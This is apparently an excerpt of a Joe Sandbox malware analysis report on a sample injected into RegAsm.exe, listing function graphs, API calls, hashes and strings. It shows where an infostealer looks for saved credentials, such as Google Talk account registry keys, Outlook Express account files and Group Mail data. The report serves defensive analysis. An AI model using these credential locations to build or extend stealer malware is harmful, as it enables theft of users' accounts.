                                                                                                                                                                                control_flow_graph 411 4036e5-4036f5 412 4037c6-4037c7 411->412 413 4036fb-403709 call 410863 411->413 415 40370e-403710 413->415 416 4037c5 415->416 417 403716-40372a strchr 415->417 416->412 417->416 418 403730-403787 call 4021b6 _mbscpy * 2 strlen 417->418 421 4037a4-4037c0 _mbscpy call 4023e5 418->421 422 403789-4037a1 sprintf 418->422 421->416 422->421
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                  • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                  • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                  • Part of subcall function 00410863: CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                • String ID: %s@gmail.com
                                                                                                                                                                                • API String ID: 3261640601-4097000612
                                                                                                                                                                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                                                                                                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                Function 00404A99 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 424 404a99-404ac2 LoadLibraryA 425 404ac4-404ad2 424->425 426 404aec-404af4 424->426 430 404ad4-404ad8 425->430 431 404add-404ae6 FreeLibrary 425->431 429 404af5-404afa 426->429 433 404b13-404b17 429->433 434 404afc-404b12 MessageBoxA 429->434 435 404adb 430->435 431->426 432 404ae8-404aea 431->432 432->429 435->431
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                                                                                                                                • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$FreeLoadMessage
                                                                                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                • API String ID: 3897320386-317687271
                                                                                                                                                                                • Opcode ID: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                • Instruction ID: 488ab604db7d7bb3946a6a0ddadc23e58717ff74c8dc9d9f2a6c2f93e1cc5ebb
                                                                                                                                                                                • Opcode Fuzzy Hash: 7992fcdcafd7ff6fedb2cae98ddd2050c088282ff9ffca5c48e78306170b2e8e
                                                                                                                                                                                • Instruction Fuzzy Hash: F401D679B512106BE7115BE59C89F6BBAACDB86759B040135BA02F1180DAB899018A5C
                                                                                                                                                                                Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 436 4034e4-403544 memset * 2 call 410b1e 439 403580-403582 436->439 440 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 436->440 440->439
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00403504
                                                                                                                                                                                • memset.MSVCRT ref: 0040351A
                                                                                                                                                                                  • Part of subcall function 00410B1E: RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                                                                                                  • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                                                                                  • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                                                                                • _mbscat.MSVCRT ref: 0040356D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                • API String ID: 3071782539-966475738
                                                                                                                                                                                • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                                                                                                                                                • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                                                                                                                                                                                • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                                                                                                                                                Function 00410863 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 445 410863-41088b UuidFromStringA * 2 446 4108dd 445->446 447 41088d-41088f 445->447 448 4108df-4108e2 446->448 447->446 449 410891-4108aa call 410827 447->449 451 4108af-4108b1 449->451 451->446 452 4108b3-4108b9 451->452 453 4108bb-4108bd 452->453 454 4108be-4108db memcpy CoTaskMemFree 452->454 453->454 454->448
                                                                                                                                                                                APIs
                                                                                                                                                                                • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                • CoTaskMemFree.OLE32(?), ref: 004108D2
                                                                                                                                                                                Strings
                                                                                                                                                                                • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                • API String ID: 1640410171-3316789007
                                                                                                                                                                                • Opcode ID: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                • Opcode Fuzzy Hash: 22d987936c379f2ddbe1f4d72e7ed5a7e1d5b1ee58518d6b198fa6640511f7ba
                                                                                                                                                                                • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                Function 00444196 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                  • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                                                                                                                                                                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                                                                                                                                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                  • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                • CloseHandle.KERNELBASE(?), ref: 00444206
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                • API String ID: 1886237854-620537770
                                                                                                                                                                                • Opcode ID: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                • Opcode Fuzzy Hash: ba2fb1ebd6d34557563497b52043a7035be6948b79178427339670267c7a2de8
                                                                                                                                                                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2054149589-0
                                                                                                                                                                                • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                                                • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                                                                                                                                                                                • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                                                                                                                                                                                Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                                                  • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                                                  • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                  • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                  • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                  • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                • memset.MSVCRT ref: 00408620
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • memset.MSVCRT ref: 00408671
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004086D6
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                                                                                                                                                                                • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                • API String ID: 1366857005-1079885057
                                                                                                                                                                                • Opcode ID: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                                                • Opcode Fuzzy Hash: e382b87db7f0bd43b4e3522d782a37f7f61fb274bdede134f0936f9282285683
                                                                                                                                                                                • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                                                                                                                                                                                Function 00410DBB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 00410DF2
                                                                                                                                                                                • memset.MSVCRT ref: 00410E10
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                                                                                                • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                                                  • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                Strings
                                                                                                                                                                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFolderLibraryLoadPathSpecialVersion_mbscpymemset
                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                • API String ID: 218411198-2036018995
                                                                                                                                                                                • Opcode ID: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                                                • Opcode Fuzzy Hash: 7ac12f80f2b375b89f7afb4171d908dc2817b99221bb223db89aef840bd4f41a
                                                                                                                                                                                • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                                                                                                Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                • String ID: /nosort$/sort
                                                                                                                                                                                • API String ID: 882979914-1578091866
                                                                                                                                                                                • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                                                • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                                                • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                                                                                                                Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004109F7
                                                                                                                                                                                  • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                                                  • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                                                • memset.MSVCRT ref: 00410A32
                                                                                                                                                                                • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3143880245-0
                                                                                                                                                                                • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                                                • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                                                • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                                                                                                Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                • Opcode ID: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                • Opcode Fuzzy Hash: 503c09cd7de9972ac8ba5625359fc448a9b0e456fd4c2f147f53c83827732b04
                                                                                                                                                                                • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1033339047-0
                                                                                                                                                                                • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                                                                                                • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                                                                                                • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                                                                                                Function 00402A14 Relevance: 4.5, APIs: 3, Instructions: 49registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00402A34
                                                                                                                                                                                  • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                • RegCloseKey.KERNEL32(?,?,?), ref: 00402A7A
                                                                                                                                                                                • RegCloseKey.KERNEL32 ref: 00402A95
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Close$Enummemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1615280680-0
                                                                                                                                                                                • Opcode ID: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                • Instruction ID: 4e227b58271400dae14a407a15e496f509ceac9baab3320f2be5fe13b191b239
                                                                                                                                                                                • Opcode Fuzzy Hash: a95c34967b0cb9b80c80469a4993c45ab25de0f8a69c3d9d5225f488b7e1c4ba
                                                                                                                                                                                • Instruction Fuzzy Hash: D10179B590000CFFEB21EF51CD81EEA776DDF50388F100076BA84A1051E6759E959A64
                                                                                                                                                                                Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • malloc.MSVCRT ref: 00406F4C
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,?,004045BE,00000001,?,?,00000000,00401B21,?), ref: 00406F64
                                                                                                                                                                                • free.MSVCRT ref: 00406F6D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: freemallocmemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3056473165-0
                                                                                                                                                                                • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                                                                                                • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                                                                                                                • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                                                                                                Function 00410B1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • Part of subcall function 00410ADD: RegQueryValueExA.KERNEL32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                                                                                                • RegCloseKey.KERNEL32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                                                                                • String ID: sqlite3.dll
                                                                                                                                                                                • API String ID: 3677997916-1155512374
                                                                                                                                                                                • Opcode ID: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                • Instruction ID: 87b963fc64edc678a4f0440c700721264c86d0e3755c9c93a3ce53f579e10251
                                                                                                                                                                                • Opcode Fuzzy Hash: 8e969e5ca9bf6096602a78be3d4e5059fdca8f737fa6ec707583d0e92d73378d
                                                                                                                                                                                • Instruction Fuzzy Hash: 3DE0C972A00119BBDF11AF91DD06ADA7BA9EF14298B000061FD0591221E776DEA4EAD4
                                                                                                                                                                                Function 00406D01 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID: eBD
                                                                                                                                                                                • API String ID: 823142352-44267735
                                                                                                                                                                                • Opcode ID: 245fd492edc90e6f7beb3f7fe0fc2542e4d9025ddba3e970a97606beca3aa0ab
